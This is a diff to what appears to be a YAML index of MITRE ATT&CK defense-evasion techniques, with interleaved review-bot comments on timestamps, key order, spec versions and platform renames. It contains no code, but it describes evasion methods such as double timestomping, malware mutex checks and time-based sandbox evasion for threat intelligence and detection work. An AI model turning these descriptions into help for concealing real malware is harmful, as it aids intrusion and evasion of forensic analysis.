- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests: []
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
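Review bot: the `modified` value for T1055 moves backwards, from `2023-05-09T14:00:00.188Z` to `2023-03-30T21:01:45.488Z`, and the same happens for T1205, T1218.002, T1599.001, T1553.003, T1207 and T1553.006 further down. A regenerated timestamp that predates the one it replaces normally means the previous import carried a bulk release timestamp instead of the object's own; the recurring `14:00:00.188Z` pattern in the removed values makes that plausible, but it should be stated in the commit message so nobody reads the older dates as a regression in the source data.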
@@ -3822,12 +3892,11 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests: []
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests: []
T1620:
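Review bot: most of the T1070.006 hunk is key reordering (platforms, domains, contributors, `id`/`type`/`created` and the external references all move), which buries the substantive change: a rewritten description covering `$SI`/`$FN` and double timestomping, two new data sources, one new contributor, three new references and the removal of `x_mitre_permissions_required`. Having the exporter emit keys in a stable order would keep future diffs reviewable. Two details to check in the new content: the Double Timestomping reference description ends in `there..` (double period), and dropping `x_mitre_permissions_required` removes the root/SYSTEM/User list; the new description partly compensates by stating that `$SI` is modifiable at user level while `$FN` needs kernel interaction, so readers lose nothing, but any tooling that filtered on that key should be checked.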
@@ -4134,9 +4219,76 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests: []
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
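Review bot: the new T1480.002 block is missing the `identifier: T1480.002` line that the neighbouring blocks carry between `x_mitre_modified_by_ref` and `atomic_tests` (compare T1620 directly above and T1070.006 earlier in this patch); it goes straight from `x_mitre_modified_by_ref` to `atomic_tests: []`. A few existing blocks also lack the key (T1205, T1550), so if it is optional that should be stated; otherwise add it here. Minor style points in the same block: the third contributor uses an en dash (`Nagahama Hiroki – NEC Corporation Japan`) where the other two use a comma, the platform list is ordered Windows, Linux, macOS while the rest of the file uses Linux, macOS, Windows, and `x_mitre_detection` is an empty string, which the file allows (T1556.007 does the same) but means the technique ships with no detection guidance.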
@@ -4200,57 +4352,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4265,6 +4370,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
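Review bot: please confirm the new Deloitte Environment Awareness link, which now carries an `/edit` suffix on the same Drive file id and a retrieved date of September 13, 2024, opens for an unauthenticated reader; the share form readers usually get is `/view`, and `/edit` may redirect or prompt for sign-in depending on the file's sharing settings. The rest of this hunk only reorders the T1497.003 references (Joe Security entries first, Deloitte last) and re-adds the STIX keys that the earlier removal hunk took out, so the link is the only thing here that can actually break.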
@@ -4338,8 +4490,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests: []
T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests: []
T1218.002:
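Review bot: T1562.002 keeps `x_mitre_attack_spec_version: 3.1.0` while the other objects that had 3.1.0 in this patch (T1070.008, T1218.003) are bumped to 3.2.0. If the value is copied per object from upstream that is fine, but the mix of 2.1.0, 3.1.0 and 3.2.0 left in the file after this change is worth a sentence in the commit message stating that the field is copied, not normalised, so the next reviewer does not treat it as a missed bump.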
@@ -4520,7 +4670,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests: []
T1599.001:
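Review bot: for T1218.002 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing replaces the latter; T1599.001 and T1207 get the same treatment further down. Elsewhere in the patch `x_mitre_attack_spec_version` survives unchanged (T1205, T1553.003) or is bumped to 3.2.0 (T1556.007), so after the change some technique blocks have the key and some do not. Either drop it everywhere or keep it everywhere; a consumer that branches on the spec version will otherwise see an absent key for a subset of techniques.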
@@ -4583,7 +4731,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
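Review bot: retiring `Office 365` and `Google Workspace` as platform names in T1550 (T1070.008 and T1556.007 get the same rename in this patch, with `Azure AD` also retired for T1556.007) needs a matching regeneration of anything that groups techniques by platform name, such as per-platform index files; otherwise the retired names survive in derived artifacts while the source no longer produces them. The replacements `Identity Provider` and `Office Suite` are appended after `Containers` rather than placed where the old entries were, which is harmless but worth knowing when diffing against upstream.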
@@ -4702,18 +4849,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests: []
T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
